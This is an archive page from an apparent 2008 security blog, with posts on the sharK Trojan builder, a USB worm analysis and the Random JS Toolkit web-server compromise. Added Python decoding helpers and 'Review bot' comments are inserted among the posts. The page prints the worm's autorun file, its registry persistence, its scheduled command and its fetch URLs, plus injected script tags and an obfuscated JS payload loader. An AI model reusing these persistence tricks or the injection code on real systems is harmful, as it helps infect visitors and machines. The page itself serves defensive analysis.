Showing posts with label malware.

Feb 29, 2008

Big Mac

PayPal warns against using Apple's Safari:

Safari doesn't make PayPal's list of recommended browsers because it doesn't have two important anti-phishing security features, according to Michael Barrett, PayPal's chief information security officer.
Perfectly valid reasoning. A couple of Mac users cannot seem to understand the precaution suggested.

In other news, Apple customer service representatives are in denial too.
I called Apple and spoke with a couple of their reps. […] The reps were incredulous about the existence of malware specifically targeting Macs. They looked up articles about it while we were on the phone — they wouldn't believe me until they looked it up for themselves.

I have a couple of friends who primarily use Mac OS X and other Apple products because of the sense of superiority that comes with it. Most of them are oblivious to the dangers. The sense of invincibility is simply a liability.

Feb 26, 2008

Point and Click Trojan

sharK definitely dumbs down Trojan creation; it requires no programming skill at all. It allows for the creation of malware with features such as:

  • encryption
  • polymorphism
  • custom payloads
  • virtual machine detection
  • compression
  • debugger detection
  • password mining
  • remote management
  • software inventory
  • active process and network connection information
  • capture desktop and webcam images
  • record audio
  • log keystrokes
  • analyze network traffic
  • take out the trash (not really)
Impressive set of features and capabilities. I wouldn't be surprised if signature-based detection of sharK-made malware variants is abysmal. At the moment I can't think of legitimate uses for sharK besides remote administration.

It's interesting to note that sharK has detection capabilities for sandboxes and virtual machines. The Trojan can be made to behave differently when it detects that it is running inside the following:
  • VMWare
  • Microsoft Virtual PC
  • Innotek VirtualBox
  • Symantec Altiris SVS
  • Sandboxie
  • Norman Sandbox

If you're wondering how the local neighborhood kiddie is churning out custom malware, sharK is the likely tool.

Feb 18, 2008

Top 10 Podcast Episodes

Over the years I have compiled my favorite security podcast episodes. Here is my list of top ten shows. Most of these episodes are interviews. Here they are in no particular order:


  1. The Silver Bullet Security Podcast, Show 013 - An Interview with Ross Anderson
    Gary McGraw interviews Ross Anderson, author of the book Security Engineering. He is one of the researchers in the Security Group at the University of Cambridge Computer Laboratory, which has a blog that I check regularly, Light Blue Touchpaper.

    Gary and Ross talk about the book, the economics of information security, Ben Edelman's paper, disclosure and RFID MITM attacks.

  2. The Silver Bullet Security Podcast, Show 016 - An Interview with Greg Hoglund
    Gary interviews Greg Hoglund, author of Exploiting Software, Rootkits and Exploiting Online Games. In fact, Gary McGraw co-authored the first and third books mentioned.

    They talk about reverse engineering, disclosure, rootkits, EULAs, exploiting software and cheating online games.

  3. SploitCast Podcast #008
    Guest Victor Oppleman, author of Extreme Exploits, discusses the RADB, ISP attacks, darknets, uRPF, botnets, DDoS, DNS attacks and tools.

    I originally wanted to feature a ThreatCast interview with Barrett Lyon, founder of Prolexic, but I think this interview with Victor covers more ground, not just DDoS attacks.

  4. SploitCast Podcast #016
    The host interviews Dino Dai Zovi, discussing the fascinating topic of virtual machine rootkits, OS X security, wifi attacks, vulnerability development, disclosure and Microsoft security.

  5. StillSecure, After all these years, Podcast #47 - Web application security with RSnake and Jeremiah
    Alan and Mitchell interview Robert "RSnake" Hansen of ha.ckers.org, founder of SecTheory, and Jeremiah Grossman, founder and CTO of WhiteHat Security. Of course they discussed application security, and of course they focused more on web application security.

  6. ThreatCast - Great debate podcast : NAC v SNF
    Alan Shimel, Chris Hoff, Richard Stiennon and Mike Rothman debate NAC, Network Admission Control. Bullshit was thrown, heads rolled and no conclusions were reached.

  7. Security Now 91: Marc Maiffret of eEye Digital Security
    Leo and Steve interview Marc Maiffret. Marc talks about how he got started in security, Windows and Mac OS X security, 0days, vulnerability development, client-side attacks and eEye's products.

  8. McAfee AudioParasitics Episode 17
    Jim and Dave are joined by Dave Aitel of Immunity. Dave Aitel talks about his stint at @stake, Immunity's products, mobile devices, penetration testing, virtualization, vulnerability development and malware.

  9. McAfee AudioParasitics Episode 19
    McAfee AudioParasitics Episode 20
    This two-part show features guests Rafal Wojtczuk and Rahul Kashyap. The hosts and the guests talk about malware on virtual machines and virtualization security in general.

  10. PaulDotCom Security Weekly - Interview with Mike Poor & Ed Skoudis - Part 1
    PaulDotCom Security Weekly - Interview with Mike Poor & Ed Skoudis - Part 2
    Larry and Paul interview Mike Poor and Ed Skoudis. They talk about their first computers, how they got started in security, SANS, the ISC, botnets, malware, Brazilian hacker groups, physical NOP sleds, research and security in general.

Listen to these podcasts while they're still online and most of the topics discussed aren't stale yet.

Feb 9, 2008

Amateur Malware Analysis

A friend asked me to check his USB drive because it was not working. I attached it to my notebook and mounted it. It seemed fine: I could access his files, plus a bonus suspicious executable with a blurry folder icon. Apparently the USB port he was attaching the drive to was not working. I copied the executable and the autorun.ini from his drive.

It's a Saturday evening and I have some time to spare, so I check out the suspected malware. Here I take a shot at malware analysis.

The autorun.ini is obvious:

[Autorun]
Open=scvhost.exe
Shellexecute=scvhost.exe
Shell\Open\command=scvhost.exe
Shell=Open

Uploaded scvhost.exe to Jotti's malware scan.

Uploaded it to Norman Sandbox but it does not show any helpful information.
[ DetectionInfo ]
* Sandbox name: NO_MALWARE
* Signature name: DLoader.EGQI
* Compressed: YES
* TLS hooks: NO
* Executable type: Application
* Executable file structure: OK

[ General information ]
* Decompressing UPX3.
* File length: 225792 bytes.
* MD5 hash: 24fcddb3010f0dc16079af055a9970f0.

I tried to uncompress it using UPX, but it seems to be intentionally corrupted or compressed with UPolyX.
$ upx-3.02-i386_linux/upx  -d scvhost.exe 
Ultimate Packer for eXecutables
Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007
UPX 3.02 Markus Oberhumer, Laszlo Molnar & John Reiser Dec 16th 2007

File size Ratio Format Name
-------------------- ------ ----------- -----------
upx: scvhost.exe: NotPackedException: not packed by UPX

Unpacked 0 files.
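Before blaming a scrambler it is worth checking which UPX fingerprint is actually missing. The stock unpacker looks for its "UPX!" pack header; the packer also leaves recognisable UPX0/UPX1 section names. A file that Norman identifies as UPX-compressed but that upx -d rejects as "not packed by UPX" usually has had one of the two scrubbed. The script below is an added example, not part of the original post: it walks the PE section table with nothing but struct, greps for the magic, and reports which fingerprint survives. The build_fake_pe() helper constructs a skeleton PE (no valid optional header or code) purely so the check can be exercised offline; it is not an executable.

```python
import struct

UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}
UPX_MAGIC = b"UPX!"   # pack-header magic that `upx -d` requires


def pe_section_names(data):
    """Return the section names of a PE image, or raise ValueError if it is not one."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    (num_sections,) = struct.unpack_from("<H", data, coff + 2)
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)
    table = coff + 20 + opt_size                          # first IMAGE_SECTION_HEADER
    names = []
    for i in range(num_sections):
        raw = data[table + 40 * i:table + 40 * i + 8]
        if len(raw) < 8:
            raise ValueError("truncated section table")
        names.append(raw.rstrip(b"\0"))
    return names


def upx_fingerprint(data):
    """Classify a PE as upx-intact, upx-scrubbed (one fingerprint gone) or no-upx."""
    names = pe_section_names(data)
    has_sections = any(n in UPX_SECTION_NAMES for n in names)
    has_magic = UPX_MAGIC in data
    if has_sections and has_magic:
        verdict = "upx-intact"        # `upx -d` should work
    elif has_sections or has_magic:
        verdict = "upx-scrubbed"      # packed layout, but header tampered with
    else:
        verdict = "no-upx"
    return {"sections": names, "upx_sections": has_sections,
            "upx_magic": has_magic, "verdict": verdict}


def build_fake_pe(section_names, include_magic):
    """Constructed test fixture: MZ stub, PE signature, COFF header with an empty
    optional header, the given section names, and an optional UPX! magic in the tail."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                 # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0x0102)
    sections = b"".join(n.ljust(8, b"\0") + bytes(32) for n in section_names)
    tail = bytes(16) + (UPX_MAGIC + b"\x0d\x0b" if include_magic else b"\x00\x06")
    return bytes(dos) + b"PE\0\0" + coff + sections + tail


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, upx_fingerprint(fh.read()))
```

Run it as `python upxcheck.py scvhost.exe`. A verdict of upx-scrubbed tells you the file still unpacks in memory the normal way, so dumping the process after the stub has run (as the post does further down) is the practical route rather than fighting the static unpacker.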

The uncompressed part of the executable reveals a couple of details. It looks like it was scripted with AutoIt.
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
type="win32"
processorArchitecture="*"
version="3.0.0.0"
name="AutoIt3"
/>

For dynamic analysis I used Sandboxie. The files it creates:
  • C:\WINDOWS\himhem.scr
  • C:\WINDOWS\scvhost.exe
  • C:\WINDOWS\system32\autorun.ini
  • C:\WINDOWS\system32\blastclnnn.exe
  • C:\WINDOWS\system32\scvhost.exe

Based on the created files, this is a variant of W32.Blastclan.

It also creates these registry entries:
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"Yahoo Messengger" = "C:\WINDOWS\system32\scvhost.exe"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\"Shell" = "X"

I don't know why the Shell is set to X; probably because it can't fetch a configuration file.

I dumped the malware's memory and found some interesting strings, like this command for a scheduled run:
/C AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\WINDOWS\system32\blastclnnn.exe

I also saw a reference to IsDebuggerPresent, which checks for a user-mode debugger.

I ran a sniffer to watch the malware's network traffic. It tries to fetch these files:
  • http://setting3.yeahost.com/setting.xls
  • http://setting3.9999mb.com/setting.xls
  • http://setting3.9999mb.com/setting.doc
  • http://www.freewebs.com/setting3/setting.doc
Those are offline now.

Unfortunately I do not have a valid configuration for the malware, so I can't analyse it further. Scouring the anti-malware sites, this worm seems to have several variants. Good evening.

Jan 20, 2008

Random JS Toolkit

Last week we saw the media coverage of the Random JS Toolkit. Several Linux servers were compromised for malware distribution, directly infecting visitors. The initial vector of compromise is currently unknown, and the rootkit installed afterwards is very stealthy to an inexperienced administrator.

It was reported that some sites were compromised repeatedly, even after a fresh operating system reinstall. As of this moment some of these sites are still up, serving malware even though they are known to be rooted.

It is easier to analyse the malware infection than the server compromise. The toolkit inserts a reference to a randomly named JavaScript file right after the <body> tag of web pages.

<script language='JavaScript' type='text/javascript' src='uxayo.js'></script>
Here are sample diffs of infected pages.
  <body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'
- stylesrc=main.html>
+ stylesrc=main.html>
+<script language='JavaScript' type='text/javascript' src='uxayo.js'></script>
<div class=Section1>
<p class=MsoNormal><!--webbot bot="Include" tag="BODY" u-include="main.html"
</head>
 -->
</script>
</head>
-<body>
+<body><script language='JavaScript' type='text/javascript' src='pkfae.js'></script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
The line is inserted by the toolkit on a visitor's first visit, keyed on the IP address, and only intermittently afterwards. The malicious JS file has several pieces of malware embedded, obfuscated as unescape() sequences, and it also downloads a Trojan binary to the visitor's machine. The filename of the binary is also randomized, as seen at the top of the JS file.
var arg="xxcjutss";

var MU = "http://" + document.location.hostname + "/" + arg;
var MH = '';
var MUT = MU;
for (i=0; i < MUT.length; i++)
{
var b = MUT.charCodeAt (i);
MH = MH + b.toString (16);
}
MH = MH.toUpperCase();
if (Math.round(MUT.length/2) != (MUT.length/2))
{
MH += '00';
}

var MR = '';
for (i=0; i < MH.length; i += 4)
{
MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2);
}

var MU2 = "\"" + MU + "\"";
var MR2 = "\"" + MR + "\"";

var SB =
unescape ('%6D%61%6C%77%61%72%65%0A') +
MU2 +
unescape ('%6D%61%6C%77%61%72%65%0A') +
MR2 +
unescape ('%6D%61%6C%77%61%72%65%0A') +
MU2 +
unescape ('%6D%61%6C%77%61%72%65%0A');

document.write (SB);
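The MH/MR loops above are worth reading closely: they take the download URL, hex-encode each character, and re-emit the hex in byte-swapped groups of four as %uXXXX. That is exactly the UTF-16LE layout unescape() produces in memory, so the same URL is handed to the payload twice, once as a plain JS string (MU2) and once as a byte sequence a binary stage can consume directly (MR2). The Python below is an added example for analysts, not code from the toolkit or the original post: it reproduces the encoding, inverts it, and decodes the unescape() literals of a script without executing it. In the snippet above those literals decode to the placeholder "malware" plus a newline, which suggests the published sample was sanitised. The hostname and the sample script fragment are constructed for the example.

```python
import re
import struct


def build_download_url(hostname, arg):
    """MU in the script: the payload URL is built from the page's own host and the random name."""
    return "http://" + hostname + "/" + arg


def to_unicode_escapes(text):
    """Reproduce the MH/MR loops: char codes to hex (JS toString(16), no zero padding,
    upper-cased), pad odd-length input with '00', then emit every 4-hex-digit group
    byte-swapped as %uXXXX."""
    mh = "".join("%x" % ord(c) for c in text).upper()
    if len(text) % 2:          # Math.round(len/2) != len/2
        mh += "00"
    return "".join("%u" + mh[i + 2:i + 4] + mh[i:i + 2] for i in range(0, len(mh), 4))


def from_unicode_escapes(escaped):
    """Invert it: each %uXXXX is a little-endian 16-bit word, so packing the words
    with '<H' restores the original byte order; strip the '00' pad at the end."""
    words = [int(w, 16) for w in re.findall(r"%u([0-9A-Fa-f]{4})", escaped)]
    raw = b"".join(struct.pack("<H", w) for w in words)
    return raw.rstrip(b"\0").decode("latin-1")


def js_unescape(s):
    """Single-pass equivalent of JavaScript unescape(): %XX bytes and %uXXXX code units."""
    def repl(m):
        return chr(int(m.group(1) or m.group(2), 16))
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})", repl, s)


def decode_unescape_calls(js_source):
    """Pull every unescape('...') literal out of a script and decode it, so the
    obfuscated fragments can be read statically."""
    return [js_unescape(lit)
            for lit in re.findall(r"unescape\s*\(\s*'([^']*)'\s*\)", js_source)]


# Constructed sample in the shape of the SB assignment above (not the live file).
SAMPLE_SCRIPT = (
    "var SB =\n"
    "unescape ('%6D%61%6C%77%61%72%65%0A') +\n"
    "MU2 +\n"
    "unescape ('%6D%61%6C%77%61%72%65%0A');\n"
)

if __name__ == "__main__":
    url = build_download_url("victim.example", "xxcjutss")   # constructed host
    mr = to_unicode_escapes(url)
    print(url, "->", mr)
    print("round trip:", from_unicode_escapes(mr))
    print("unescape literals:", decode_unescape_calls(SAMPLE_SCRIPT))
```

Pointing decode_unescape_calls() at a captured copy of the randomly named .js file is a quick way to see what the unescape() blobs really contain before running anything in a sandbox; if an inline literal decodes to a %u string, from_unicode_escapes() turns it back into the URL the payload will fetch.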
More information on the malicious JS can be seen at the TrendLabs Malware Blog. This random JS generation component of the toolkit was seen as early as April 2007 and reported in July 2007. Like the other victims, those site owners had no idea where the random JS was coming from.

From what I can gather the initial break-in is not through PHP core or web applications, since I have seen infected plain HTML and PHP pages. I have also seen Apache 2 and 1.3 serving these infected pages, JS and binaries. cPanel has released an informative security note for this toolkit. It seems to be an unknown root compromise happening on the servers. If a root shell is obtained or the rootkit is installed through /dev/kmem, the following patch can disable writing to it. Note that this is just a workaround, since the real cause of the initial compromise is unknown.
--- linux/drivers/char/mem.c 2007-10-10 04:31:38.000000000 +0800
+++ linux/drivers/char/mem_nowrite.c 2008-01-20 15:26:32.000000000 +0800
@@ -179,7 +179,7 @@ static ssize_t write_mem(struct file * f

if (!valid_phys_addr_range(p, count))
return -EFAULT;
-
+ return -EPERM;
written = 0;

#ifdef __ARCH_HAS_NO_PAGE_ZERO_MAPPED
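Review bot: the hunk is in write_mem(), which is the write handler for /dev/mem; /dev/kmem is served by a separate write_kmem() in the same mem.c, so the stated goal of blocking writes to /dev/kmem is not met by this change alone and the same early `return -EPERM;` is needed in write_kmem() too. Placing the unconditional return after the valid_phys_addr_range() check also leaves `written = 0;` and everything below it unreachable, which the compiler will flag; returning -EPERM at the top of both handlers (or dropping their .write members from the file_operations) is cleaner. Note too that the `+++` header names linux/drivers/char/mem_nowrite.c, so `patch` applied as-is would not touch mem.c unless the path is corrected.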

To work around the inclusion of the JS file, some resorted to patching their pages even though they are knowingly compromised.
 </head>
<script language='JavaScript' type='text/javascript'>/*
-//<body >
+//<body ><script language='JavaScript' type='text/javascript' src='rylet.js'></script>
//
*/
</script>
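Review bot: this hides the injected reference rather than removing it. As the `+` line shows, the injector still appends its tag after the `//<body >` token; the trick only works because the HTML parser ends the inline script at that injected `</script>`, leaving the preceding `/*` comment unterminated so nothing in it runs, and the trailing `//` and `*/` are then rendered as page text. It also depends on the toolkit continuing to target the `<body>` token, and it does nothing about the root-level compromise that is writing the file in the first place.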
Some even tried to mask the server software and version, in case it is an automated compromise.
$ curl -I www.reallybored.net 
HTTP/1.1 200 OK
Date: Fri, 18 Jan 2008 14:52:23 GMT
Server: WebServerX
X-Powered-By: PHP/4.4.6
Content-Type: text/html
$ curl -I www.bellingerfurniture.co.uk
HTTP/1.1 200 OK
Date: Fri, 18 Jan 2008 15:24:18 GMT
Server:
X-Powered-By: PHP/4.3.11
Content-Type: text/html

The details of the initial compromise are unknown yet because researchers are having a hard time obtaining post-mortem server images. Based on the information available, if this is a software vulnerability I reckon it is an obscure vulnerability in Apache (or a module) coupled with an equally obscure Linux kernel vulnerability. If that is not the case, most likely it is a backdoored server image or distribution software package. The multi-stage compromise and infection across different operating systems is cunning. This is a good example of why the good guys should always be in the know and should at least keep up with the bad guys.

Here are URLs for additional information on this nefarious toolkit.
http://blog.scansafe.com/journal/2008/1/15/mom-pop-sites-hit-hard-by-host-compromise.html
http://www.finjan.com/Pressrelease.aspx?id=1820&PressLan=1819&lan=3
http://www.webhostingtalk.com/showthread.php?t=651748
http://www.theregister.co.uk/2008/01/11/mysterious_web_infection/
http://www.channelregister.co.uk/2008/01/16/mysterious_web_infection_continues/